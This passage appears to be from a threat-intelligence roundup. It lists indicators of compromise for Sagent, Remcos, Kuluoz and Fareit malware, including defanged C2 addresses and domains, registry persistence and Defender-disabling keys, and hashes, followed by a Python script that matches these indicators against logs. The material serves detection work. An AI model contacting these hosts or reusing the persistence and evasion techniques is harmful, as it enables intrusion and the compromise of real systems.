7fe04f0111eebfeb1d602a42d78c80a48c2d4e9f139a1b432822ce2e549eb2ba
84ec757a84f0b5da11955b24486d1be60e7c6eeb2f5b8b4de656a2e498e9184b
9e8e5e20c1ac022c559a68d8ed67a7879ad68a917d4f97459bff72840bdba457
a8ccbc5df926b0a2afdeab0344b55c93b5469237350634a4f8b170d3cc40e44e
a9ea99bbe80da5f7c8bd97eadc8630831812480afdf2827d57a6620589f67ce1
ab71e50d7620b1a0563f8a088d7bbc7c8bbe110ec067dc872ffabce155ba6060
b3636289fe8f2f0879c295edc278595c6b881a594c247504fa3f83ff8bbf6592
c052401b1d61a37fad733e4e178ac084ae44067c7e88ef834d35a09c70ca39e4
c59dcd9cbd7ed3580a1172d749b6b9559b9cc68cd254741efba5b89ac4943db7
cf42f89f988611c1beb42230e001c0eb871322950ca10cd50fb1796cdf95920a
d1cabff331de0b05c7ca7deae3f63eb272dfdd9e1a343c87c7f197eec40b218d
e1b4dc1a419e73795e791969e0a11770e52adb5ed58414b51ba9e16e46ce906b
ea5c6800bd1190c1791cbc0473e214e02355bfa0803c03afec5451e14e27ee80
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, MITRE ATT&CK


Doc.Dropper.Sagent-8005726-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS (Value Name: Start) 25
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AAFA 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA00 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AAFA (Value Name: 126AAFA) 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA00 (Value Name: 126AA00) 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A455 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A696 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A687 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA3F 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A33C 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126ABF3 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A2B0 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A31D 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A7BF 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A455 (Value Name: 126A455) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A687 (Value Name: 126A687) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A696 (Value Name: 126A696) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A262 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126ABF3 (Value Name: 126ABF3) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA3F (Value Name: 126AA3F) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A33C (Value Name: 126A33C) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A31D (Value Name: 126A31D) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A2B0 (Value Name: 126A2B0) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A7BF (Value Name: 126A7BF) 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A262 (Value Name: 126A262) 1
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
239[.]255[.]255[.]250 25
151[.]101[.]248[.]133 12
151[.]101[.]128[.]133 11
151[.]101[.]64[.]133 10
199[.]232[.]36[.]133 8
151[.]101[.]192[.]133 3
151[.]101[.]0[.]133 1
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
raw[.]githubusercontent[.]com 25
github[.]map[.]fastly[.]net 18
Files and/or directories created Occurrences
%System32%\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx 25
%SystemRoot%\cer<random, matching '[A-F0-9]{3,4}'>.tmp 24
%SystemRoot%\cer58.tmp 1

File Hashes

0207adf00d503323421be3eace8b28b409c3b3326ce43431ddd6e1e7310e1d2b
07e8d94f044678b2ec1ca212931dddb28c8930927616f50e16bdffa847bc89ec
084afba4f38dfba53ac6ee63b420912e7b3fb89de954701c65620c236ccb7812
088b223ab51f4d510934957762a0972e9ce042716ebc36cd7ed692e5568de26a
0bc38c6a4aad4ef72bca07ef6fbad3acfffe3b3df7800421e7cf588e8023adaa
0cb057212a46a3949b61b3e2fd09ff92d6c4e4a07c47eb79dc2ac46ed57bf2f2
0ee50c3cedb3b1be4941ff2b78e2c5337d9aa3e71b0dddccd3ff486b65ad3547
10771c3cb28b7d8fca0f8b61ef1a64a2190ae5d94dc0f3da59a37bde40578afb
130ef51cf53390d59e750bd8d994a1228b1d749c4255d358b58fd3a4fce110be
1f14b5fc0a3f5d73ec262a88e74f8c1b5e7f1969aa7aa838c9e71de2b59af207
1fea6293b5c917a2c33c94ba2ddad83fe1ae9ffc7e9d229fd79943596dc4c19a
2194e880c184492eab89b71c89b5a12b81a3d393bbac4ecac3661520a65a94ef
23269c118ff201dfac84704f94b65720e59d7e0aa6d3e3c31f19651dc2265c2e
2d86ad4e8dcb6fdc7cff003dfdfee9447c73163eeb27f6c8982f6eb36c070e1e
2dd991084d893ec610b254cfb4e2ce98e710eeb2abbfeb5e1c85e952a2716f7d
30a2aa9fb9e0f5667ee4bc901749cca4a5a9d60d549b000ef8fa0f6d589d3930
33497e98fafc5a687e107ca561bcdbe8caee452b7c94f8561d356c3dcb426593
36ac97895d83095c4bad67cc1108690493a928f2f3a7ed91ef1d427c25dd45b7
41056674f238018dd040f330170657e0751ede5e460f7f28258bc29c66d495b9
41e6ed3d05ec7c68ce38e59a6889255cc852c4005c96250b5e311ec8140310d6
42bacd231319b10ded8780e9d77b9bb890540ce5e545dc860f5afa393284a764
45cf9d3de2576e6732f0968352dded17392730214f4d0048f73368c85e3e3743
45d25afb75ee94aca4fb412fb867c8ca6419edcac0acc54f75538786d220a73c
474d3631bca2da49d07bd5fc7855d84370a4652d26b90b6bc94f6f0bb92595fe
47b840521762b205277e601afd5775b00e536856e09af354fd3585671c794c44
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, Malware, MITRE ATT&CK


Win.Dropper.Remcos-8008767-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE (Value Name: Blob) 15
<HKCU>\ENVIRONMENT (Value Name: windir) 12
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> 11
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> (Value Name: exepath) 11
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> (Value Name: licence) 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Fjef) 1
<HKCU>\SOFTWARE\-7AIIYS 1
<HKCU>\SOFTWARE\-7AIIYS (Value Name: exepath) 1
<HKCU>\SOFTWARE\-7AIIYS (Value Name: licence) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Afwg) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Chnh) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Quym) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Hksq) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Xziw) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Owir) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Kqzy) 1
<HKCU>\SOFTWARE\-CUQLRE 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Fjcp) 1
<HKCU>\SOFTWARE\-CUQLRE (Value Name: exepath) 1
<HKCU>\SOFTWARE\-CUQLRE (Value Name: licence) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Vzhh) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Ybmv) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Pvai) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\LD3K1LBVEM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Wyon) 1
Mutexes Occurrences
Remcos_Mutex_Inj 13
Remcos-<random, matching [A-Z0-9]{6}> 11
Global\b0babf11-a759-11ea-a007-00501e3ae7b5 1
-7AIIYS 1
-CUQLRE 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]217[.]15[.]97 12
142[.]250[.]31[.]100/31 6
185[.]165[.]153[.]17 5
142[.]250[.]31[.]138/31 4
172[.]217[.]197[.]113 3
172[.]217[.]197[.]139 3
91[.]193[.]75[.]15 3
194[.]5[.]99[.]12 2
172[.]217[.]197[.]100/30 2
172[.]253[.]122[.]100/31 2
192[.]169[.]69[.]25 1
79[.]134[.]225[.]105 1
185[.]244[.]30[.]17 1
172[.]217[.]164[.]129 1
142[.]250[.]31[.]102 1
142[.]250[.]31[.]113 1
172[.]217[.]13[.]237 1
172[.]253[.]122[.]132 1
172[.]253[.]122[.]138 1
154[.]66[.]53[.]96 1
185[.]244[.]30[.]53 1
91[.]214[.]169[.]69 1
194[.]187[.]251[.]163 1
79[.]134[.]225[.]43 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
goddywin[.]freedynamicdns[.]net 3
newlogs[.]ddns[.]net 2
doc-14-54-docs[.]googleusercontent[.]com 2
thankyoulord[.]ddns[.]net 2
doc-0k-54-docs[.]googleusercontent[.]com 2
newdawn4me[.]ddns[.]net 2
doc-00-54-docs[.]googleusercontent[.]com 1
doc-0c-bc-docs[.]googleusercontent[.]com 1
boot[.]awsmppl[.]com 1
doc-14-bc-docs[.]googleusercontent[.]com 1
doc-0o-bc-docs[.]googleusercontent[.]com 1
doc-0s-54-docs[.]googleusercontent[.]com 1
doc-10-8o-docs[.]googleusercontent[.]com 1
doc-04-bo-docs[.]googleusercontent[.]com 1
doc-04-0c-docs[.]googleusercontent[.]com 1
easter87[.]duckdns[.]org 1
doc-04-5o-docs[.]googleusercontent[.]com 1
igbo[.]hopto[.]org 1
dns[.]dunamix[.]me 1
ifeanyiogbunebe[.]ddns[.]net 1
doc-10-bc-docs[.]googleusercontent[.]com 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 15
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 15
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 14
%System32%\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx 12
%PUBLIC%\Natso.bat 12
%PUBLIC%\Runex.bat 12
%PUBLIC%\fodhelper.exe 12
%PUBLIC%\propsys.dll 12
%PUBLIC%\x.bat 12
%SystemRoot% 12
%SystemRoot%\System32 12
%SystemRoot%\System32\fodhelper.exe 12
%SystemRoot%\System32\propsys.dll 12
%PUBLIC%\cde.bat 12
%PUBLIC%\x.vbs 12
%APPDATA%\remcos 2
%APPDATA%\remcos\logs.dat 2
%APPDATA%\cosp\dos.dt 1
%LOCALAPPDATA%\Fjef\Fjef.hta 1
%LOCALAPPDATA%\Fjef\Fjefset.exe 1
%LOCALAPPDATA%\Afwg\Afwg.hta 1
%LOCALAPPDATA%\Afwg\Afwgset.exe 1
%LOCALAPPDATA%\Chnh\Chnh.hta 1
%LOCALAPPDATA%\Chnh\Chnhset.exe 1
%LOCALAPPDATA%\Kqzy\Kqzy.hta 1
*See JSON for more IOCs
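The IP and domain tables above are defanged (`[.]` for `.`) and adjacent addresses are collapsed into `/31` and `/30` ranges, so they cannot be grepped for as printed. The following script, an added example that is not part of the Talos post, refangs the indicators, expands the ranges, and matches them against log lines. The indicator strings are copied from the Remcos tables above; the proxy, DNS and firewall log lines are constructed for the demonstration and are not real traffic, and the "low confidence" tag for shared hosting (the `googleusercontent.com` suffix) is this example's own heuristic, reflecting the page's warning that a single hit does not indicate maliciousness.

```python
"""Refang the defanged IOCs printed in the Remcos IP and domain tables and
match them against log lines.

Added example, not part of the Talos post. Indicators are copied from the
tables above; the log lines below are constructed, not real traffic.
"""
import ipaddress
import re
from typing import Dict, Iterable, List, Set

# Indicators exactly as printed on the page: dots defanged as [.] and
# adjacent addresses collapsed into /31 and /30 ranges.
REMCOS_IPS = [
    "172[.]217[.]15[.]97",
    "142[.]250[.]31[.]100/31",
    "185[.]165[.]153[.]17",
    "172[.]217[.]197[.]100/30",
]
REMCOS_DOMAINS = [
    "goddywin[.]freedynamicdns[.]net",
    "newlogs[.]ddns[.]net",
    "doc-14-54-docs[.]googleusercontent[.]com",
]

# Assumed heuristic: hosting shared with large amounts of benign traffic
# (Google Docs downloads) makes a hit a lead rather than a verdict.
SHARED_HOSTING_SUFFIXES = ("googleusercontent.com",)

# Constructed log lines (not real traffic): a Google Docs download, a DNS
# answer for a dynamic-DNS name, a firewall hit inside the /31 range, and
# one benign request that should not match anything.
SAMPLE_LOGS = [
    "2020-06-10T09:14:02Z proxy ws01 GET https://doc-14-54-docs.googleusercontent.com/docs/securesc/abc 200",
    "2020-06-10T09:14:05Z dns ws01 A goddywin.freedynamicdns.net -> 185.165.153.17",
    "2020-06-10T09:14:06Z fw ws01 -> 142.250.31.101:443 allow",
    "2020-06-10T09:20:11Z proxy ws02 GET https://www.example.com/ 200",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Undo the usual defanging: [.] or (.) -> . and hxxp -> http."""
    s = indicator.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE).lower()


def expand_ips(indicators: Iterable[str]) -> Set[str]:
    """Expand single addresses and CIDR ranges (/31, /30) into every address."""
    hosts: Set[str] = set()
    for ioc in indicators:
        net = ipaddress.ip_network(refang(ioc), strict=False)
        # Iterate the whole network: a /31 has no "hosts" in the RFC sense,
        # but both addresses were observed as destinations.
        hosts.update(str(addr) for addr in net)
    return hosts


def confidence(ioc_type: str, ioc: str) -> str:
    if ioc_type == "domain" and ioc.endswith(SHARED_HOSTING_SUFFIXES):
        return "low"
    return "medium"


def match_logs(lines: Iterable[str], ip_iocs: Iterable[str],
               domain_iocs: Iterable[str]) -> List[Dict[str, object]]:
    """Return one hit per (line, indicator) pair, with a confidence tag."""
    ips = expand_ips(ip_iocs)
    domains = {refang(d) for d in domain_iocs}
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        for ip in IP_RE.findall(line):
            if ip in ips:
                hits.append({"line": n, "type": "ip", "ioc": ip,
                             "confidence": confidence("ip", ip)})
        for host in HOST_RE.findall(line):
            host = host.lower()
            if host in domains:
                hits.append({"line": n, "type": "domain", "ioc": host,
                             "confidence": confidence("domain", host)})
    return hits


if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOGS, REMCOS_IPS, REMCOS_DOMAINS):
        print(hit)
```

Run against the constructed lines, the Google Docs download matches at low confidence while the dynamic-DNS lookup and the `/31` firewall hit match at medium confidence; the benign request produces nothing. Feed the full JSON referenced above into the two indicator lists for real hunting.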

File Hashes

06e837cf74eb917798ba6dbf0c7bf1e46c18f405cb7d041055960f4e2c620e34 14d24d9df46dc27d58afd005831bc9562935288f71bb841d4ef2443b7c4b9c2a 1df9aa28e1f0652e0797e7531c2965387107ecb56b2988f260d758a932ce3d1b 2026c016c434e228d3de8eb02b84b893945a7a3ef587c25f7905fb4074d1bb17 209b2993614bf38e6fec5366e7efceabccab004b5bb520460ad007322aa0c887 3eb8a01a674c2743110a46c80eb39a9df8e15f66b26cfa952c1bb2eb80bb61fa 4c4be9e45f7425bbf936d54a825693680e8fa40f24e631d8d2fa6f0efb0c287a 5f1f324c116e3d0746d51648274c312a6efc9c8a24b3445524ce0752f095803a 644aa25d23ed0bde16287cbf053890168f01b13ba8909a1c9b984f8f2f58180f 885bc11f09421b521a2191e98b6521adc1d7bb06958cd30aff8a8164e5549538 9188298a545444368a26d4d1fcc9be1e49ed55660891458d75c3dd5a2981c93b 9ad345199fba200ac03609aa9a93be1c10663b7c2c1f3d0467e747f0f0147caf 9f79c726da368c45204189299e29e0f24811ec64a8a88856a377f3022408b67a a7d93e9c9bb80f0f8a271ae4a101f305bac535e197697b35f291794fa83ef538 b998f50b9c00f40da20ac278d592db8b3b772a32bb619558cca87c2b51d48c10

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


MITRE ATT&CK




Win.Dropper.Kuluoz-8010459-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 299 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 298
<HKCR>\LOCAL SETTINGS\MUICACHE\\52C64B7E
Value Name: LanguageList
2
<HKCU>\SOFTWARE\FVPCRRGX
Value Name: omahibpg
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ipgbexib
2
<HKCU>\SOFTWARE\JGWEGPDF
Value Name: buxxdimc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ahjrnoir
2
<HKCU>\SOFTWARE\GDNCOUXE
Value Name: jghihpcd
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: humuqpua
2
<HKCU>\SOFTWARE\UFDWSBVK
Value Name: havralbl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: emwpkief
1
<HKCU>\SOFTWARE\XKWWBDOL
Value Name: pfqwduxb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xwhmvivr
1
<HKCU>\SOFTWARE\PVISGDLT
Value Name: oujictst
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ingmhxih
1
<HKCU>\SOFTWARE\CEGOFCPI
Value Name: iskwljbh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jrehkxkn
1
<HKCU>\SOFTWARE\HPVHGWUN
Value Name: dlbbndpm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: heipptsf
1
<HKCU>\SOFTWARE\VSLNLGMM
Value Name: mgmvqkpj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: aohhnqkv
1
<HKCU>\SOFTWARE\RISPOMLI
Value Name: jckcrwfg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ltcspgme
1
<HKCU>\SOFTWARE\OKTHLARI
Value Name: kugewrbn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hkaeegdr
1
<HKCU>\SOFTWARE\VIRQTXUO
Value Name: wfheopoa
1
Mutexes Occurrences
aaAdministrator 298
abAdministrator 298
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]212[.]253[.]253 273
195[.]206[.]7[.]69 268
222[.]236[.]47[.]53 265
95[.]141[.]32[.]134 241
46[.]55[.]222[.]24 240
162[.]144[.]60[.]252 238
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 298
%HOMEPATH%\Local Settings\Application Data\poqwhlut.exe 1
%HOMEPATH%\Local Settings\Application Data\dtkmfljp.exe 1
%HOMEPATH%\Local Settings\Application Data\quwwmhua.exe 1
%HOMEPATH%\Local Settings\Application Data\eltjatmp.exe 1
%HOMEPATH%\Local Settings\Application Data\seuxbide.exe 1
%HOMEPATH%\Local Settings\Application Data\getrrbdf.exe 1
%HOMEPATH%\Local Settings\Application Data\riuodjqi.exe 1
%HOMEPATH%\Local Settings\Application Data\jcfluvao.exe 1
%HOMEPATH%\Local Settings\Application Data\uaqvukvf.exe 1
%HOMEPATH%\Local Settings\Application Data\evvkeaas.exe 1
%HOMEPATH%\Local Settings\Application Data\smdpshqf.exe 1
%HOMEPATH%\Local Settings\Application Data\jntelsbq.exe 1
%HOMEPATH%\Local Settings\Application Data\frnabejc.exe 1
%HOMEPATH%\Local Settings\Application Data\gtqtcstp.exe 1
%HOMEPATH%\Local Settings\Application Data\kntlhtov.exe 1
%HOMEPATH%\Local Settings\Application Data\voeoknlk.exe 1
%HOMEPATH%\Local Settings\Application Data\tcpipjsh.exe 1
%HOMEPATH%\Local Settings\Application Data\xlvkpsxa.exe 1
%HOMEPATH%\Local Settings\Application Data\whfmeunk.exe 1
%HOMEPATH%\Local Settings\Application Data\pcbvaoix.exe 1
%HOMEPATH%\Local Settings\Application Data\muhmnulh.exe 1
%HOMEPATH%\Local Settings\Application Data\gpmbccwn.exe 1
%HOMEPATH%\Local Settings\Application Data\penarfmg.exe 1
%HOMEPATH%\Local Settings\Application Data\uvvjtamq.exe 1
*See JSON for more IOCs

File Hashes

01579a1a592019390559d44e1405e464311a7d674c5e873695dc1b80f4c918fe 033371e741d2770ba5ddde99aa78f19d34c7c6c0fb1dacda5615ce517a7634a4 0367b8a2307abc0afcd3fea38027b315fe1ced9e13ebb3fd10d180ef32ce9dc5 03b877b12c56250c28fd1fdadc1685e067a3dd45a4b22314764348b6fbe3450e 03bd20bff161d670d1908689c3807f8c06f9c63cd09e6518b5341b2eb3136172 047437f3e5b4a2d02f2058b29e10036c7332e0716785aa9c8f446d24390d2870 0477d369bb24c908c647a1e3aede09c52829f24901f095cd84076ac4d21b5269 04ccb33b85d222bcee69d1f0b83b9166f2fa68fbf1d60a8e69af560b49c1820e 0594e1eeb178c6fd9e3135b522da87c459a346055f2cad72135db117fb815a14 0b9f39fbe13ee399d13feb6b23f3bdfb427ddffe4e09866c7e6d963149849d04 0dc128d1a5f44a18067f915d760299e52fe03bf704bf296a88533d256e93b4e0 0e008f3e530087922b40eedb8ff7719822d4c52345cc4ce852ac2418a0a010a4 0f202bf47fa6f36ad7d13ababb244374c483f4f5956ac0faa28ea46272f32450 0f487bfd437563c856ea7d3c23485b090fd1983830f27d59a263418d8f4f67c0 10d7f5c902f674e16c907ff1c0975f83045fe4a40bbbc7eb57f306c186a3f50c 1311102294faf428f83c6e9a19c699b113939260b71ceb9d59ec93c7b7a866bc 13b9d1d8c4cc9e0935683ce88b8926946f9c40107cdabcd1eac8a67511bfe2cb 14e2b372efc45c4a28290360182f965f16821f747be0a3354992618132dd750f 153c96cccea4608a19fccbdc3255ff44e6040261b62bae1bff639a7b60cfca6a 1568d1baf709a9b13a538752a4908a52dfd59039855a26ba0391a5f115c9e117 15a61e95184f33043799bb653ab0dccd86524d429893bb3e0c104ab70cd50f68 1665595f6c691f47cb0323f7c7f47d7f7aa47dd41899be09669b97ab3202bd1f 179146e00f81fd25c7cd34dd5568bf4236551585cfd94848a1c38016db13473a 192f9dc4c002d3db693a5a3d5622a50de8c016c254b99e3a6ede692d64e47e3b 1b250ca896fa1acf693e3e1deb4652fb9dfca755572504db7eae3de578dfcfe2
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Fareit-8010489-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0 10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0
Value Name: DisplayName
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0
Value Name: UninstallString
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: estikk
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hetsda
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\system32\rundll32.exe
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\RICLICY 1
